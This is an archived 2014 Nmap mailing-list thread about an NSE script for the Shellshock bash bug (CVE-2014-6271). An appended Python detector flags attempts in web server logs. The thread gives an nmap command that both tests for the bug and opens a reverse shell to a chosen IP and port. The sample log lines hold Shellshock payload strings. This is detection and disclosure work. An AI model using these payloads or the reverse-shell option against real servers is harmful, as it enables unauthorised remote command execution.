Nmap Development mailing list archives

Re: Shell Shock NSE Script (CVE-2014-6271)


From: Dean Pierce <pierce403 () gmail com>
Date: Mon, 29 Sep 2014 13:07:27 -0700

I feel like having a payload of something like "sleep 3" would make
more sense than the various pingback methods.  Then you just wait
to see whether the request takes ~3 seconds, rather than having to set up a
listener on some publicly exposed server.

  - DEAN

On Fri, Sep 26, 2014 at 1:45 AM, Paul Amar <paul () sensepost com> wrote:
Hi list,

I created an NSE script for the Shell Shock vulnerability (CVE-2014-6271).

I tested the script with Pentesterlab's VM located here:
files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso.

This script detects if the host is vulnerable.
If so, you get a reverse shell by specifying the good arguments.

E.g.:

./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d

Feel free to send any feedback,
Paul

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
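Whichever payload a scanner or attacker uses (a "sleep 3" probe as Dean suggests, a pingback, or the reverse shell the script sets up), the trigger for CVE-2014-6271 is the same: a bash function definition, "() {", placed in a request header or query string that a CGI handler copies into an environment variable. That makes the attempts easy to spot in ordinary web server access logs. The following is an added example, not code from the thread or from the Nmap project: a small Python detector that parses Apache/Nginx "combined" format lines and flags any request whose path, Referer or User-Agent carries that signature. The log lines are constructed for the example, and the record field names and the helper names are my own choices.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote

# Signature of a bash function definition inside a variable value, the
# trigger for CVE-2014-6271: "()" followed by optional whitespace and "{".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/Nginx "combined" log format. The two trailing quoted fields are the
# Referer and User-Agent headers, which a CGI server exports verbatim as the
# HTTP_REFERER and HTTP_USER_AGENT environment variables of the script.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log (not real traffic): one timing probe in the
# User-Agent, one echo test in the Referer, one URL-encoded attempt in the
# query string, and two benign requests, one containing a bare "()".
SAMPLE_LOG = """\
203.0.113.5 - - [26/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/sleep 3"
198.51.100.7 - - [26/Sep/2014:10:01:13 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [26/Sep/2014:10:01:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; echo vulnerable" "curl/7.37.0"
192.0.2.9 - - [26/Sep/2014:10:02:00 +0000] "GET /cgi-bin/status?name=%28%29%7B%20%3A%3B%7D%3B HTTP/1.1" 500 0 "-" "curl/7.37.0"
192.0.2.9 - - [26/Sep/2014:10:02:01 +0000] "GET /about.html HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; () scanner)"
"""


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def find_shellshock_attempts(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one hit record per (line, field) carrying the "() {" signature."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        if not line.strip():
            continue
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line; a production pipeline would count these
        for field in ("request", "referer", "agent"):
            value = rec[field]
            if field == "request":
                # The request line is URL-encoded; the CGI QUERY_STRING variable
                # is too, but some handlers decode it, so match on the decoded form.
                value = unquote(value)
            if SHELLSHOCK_RE.search(value):
                hits.append({
                    "line": lineno,
                    "ip": rec["ip"],
                    "field": field,
                    "value": value,
                    "request": rec["request"],
                })
    return hits


def count_by_ip(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Aggregate hits per source address for triage."""
    return dict(Counter(str(h["ip"]) for h in hits))


if __name__ == "__main__":
    found = find_shellshock_attempts(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'line {h["line"]}: {h["ip"]} via {h["field"]}: {h["value"]!r}')
    print("per source:", count_by_ip(found))
```

The signature deliberately ignores what follows the function body, so a "sleep" probe, an "echo" test and a download-and-execute payload all match the same rule; the bare "()" in the last sample line shows why the "{" is required to avoid flagging ordinary User-Agent strings. A sleep-based probe of the kind Dean describes additionally shows up as an unusually long request duration if the server logs one (Apache's %D or Nginx's $request_time), which is a useful second signal on a host where the headers themselves are not logged.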